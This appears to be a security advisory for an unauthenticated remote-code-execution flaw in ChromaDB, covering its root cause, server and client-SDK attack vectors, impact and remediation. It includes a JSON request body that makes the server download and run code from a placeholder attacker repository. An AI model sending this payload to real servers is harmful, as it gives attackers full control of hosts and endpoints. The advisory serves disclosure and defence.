CVE-2026-45829: Pre-Authentication Remote Code Execution in ChromaDB via ChromaToast

ChromaDB is an open-source vector database designed for artificial intelligence applications. It provides storage, search, and retrieval capabilities for embeddings. The platform offers a Python-based server and a corresponding client SDK, facilitating interaction with various machine learning models.

CVE-2026-45829 is an unauthenticated Remote Code Execution (RCE) vulnerability affecting ChromaDB versions 1.0.0 through 1.5.8. The vulnerability involves improper input validation during the processing of embedding function configurations. This flaw allows attackers to execute arbitrary code on the host system.

The issue resides in the handling of the trust_remote_code parameter within the SentenceTransformerEmbeddingFunction. When a user requests the creation of a new collection, the server instantiates the specified embedding function based on the provided configuration. The lack of prior authentication or strict parameter filtering exposes the underlying execution engine to untrusted inputs.

The root cause of CVE-2026-45829 is a combination of insecure deserialization principles applied to configuration data and the unsafe default capabilities of the underlying machine learning libraries. The application processes collection configurations submitted via POST requests to the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint.

The application utilizes a function named load_create_collection_configuration_from_json to parse the incoming request body. This function accepts arbitrary keyword arguments (kwargs) and passes them directly to the specified embedding function class. In the case of the SentenceTransformerEmbeddingFunction, these arguments are passed down to the Hugging Face sentence-transformers library.

The Hugging Face library supports a parameter called trust_remote_code, which dictates whether the application should download and execute custom Python scripts associated with a model repository. By supplying a malicious repository name in the model_name field and setting trust_remote_code: true within the kwargs, an attacker forces the server to fetch and execute arbitrary code. This execution occurs prior to the implementation of FastAPI middleware security controls, bypassing any configured authentication requirements.

Exploitation of CVE-2026-45829 requires an attacker to host a malicious model repository on the Hugging Face Hub or a compatible registry. This repository contains the Python payload designed to execute upon initialization by the target system. The attacker then constructs a specific JSON payload to trigger the vulnerability.

The attacker issues an unauthenticated HTTP POST request to the collection creation API endpoint. The request body defines a new collection and explicitly sets the embedding_function configuration to utilize the sentence-transformers library. The configuration specifies the attacker-controlled model repository and enables the remote code execution flag.

{
  "name": "malicious_collection",
  "embedding_function": {
    "name": "sentence-transformers",
    "config": {
      "model_name": "attacker-namespace/malicious-repo",
      "kwargs": {
        "trust_remote_code": true
      }
    }
  }
}

Upon receiving this request, the ChromaDB server attempts to initialize the collection. The sentence-transformers library connects to the specified repository, downloads the model artifacts including the custom Python script, and executes the script within the context of the ChromaDB process. This results in immediate code execution without requiring prior authentication.

In addition to direct server exploitation, CVE-2026-45829 introduces a secondary attack vector targeting the ChromaDB Python Client SDK. This vector relies on an attacker gaining sufficient access to modify an existing collection or create a new, poisoned collection on a centralized ChromaDB instance.

Once access is established, the attacker sets the collection's embedding function configuration to reference their malicious repository and enables the remote code flag. The server stores this configuration persistently. The vulnerability lies dormant until a legitimate user interacts with the compromised collection.

When a user connects to the poisoned collection using the Python Client SDK without explicitly defining a local embedding function, the SDK automatically retrieves the collection configuration from the server. The client application then instantiates the embedding function locally, downloading and executing the attacker's code on the client machine. This mechanism effectively transforms the ChromaDB server into a distribution point for malicious code.

The impact of CVE-2026-45829 is categorized as critical, possessing a CVSS v4.0 score of 10.0. An attacker achieving exploitation gains unauthenticated Remote Code Execution on the host running the ChromaDB server. This execution occurs with the privileges of the ChromaDB process.

Successful exploitation permits full compromise of the underlying operating system. The attacker can exfiltrate sensitive data stored within the vector database, including proprietary embeddings and associated metadata. The attacker can also modify existing data, corrupting the integrity of downstream artificial intelligence applications relying on the database.

Furthermore, the compromised system serves as a foothold for lateral movement within the target network. The secondary attack vector extends the impact beyond the server infrastructure, threatening the endpoints of developers and data scientists interacting with the database via the Python SDK.

The primary remediation for CVE-2026-45829 is upgrading the ChromaDB server and client components to a version subsequent to 1.5.8. System administrators must ensure that all instances of the application, including those deployed within containerized environments, are updated to a secure release.

If immediate patching is unfeasible, administrators must disable the trust_remote_code functionality within the global server configuration. This mitigation prevents the sentence-transformers library from executing custom scripts, neutralizing the primary attack vector. Administrators should verify that this configuration change does not disrupt legitimate operations requiring remote model code.

Organizations must enforce strict network security controls around the ChromaDB API. Access to the API should be restricted using firewalls or Virtual Private Clouds (VPCs) to prevent exposure to untrusted networks. Additionally, robust authentication mechanisms, such as Static API Keys or OAuth, should be implemented to ensure only authorized entities can interact with the collection management endpoints.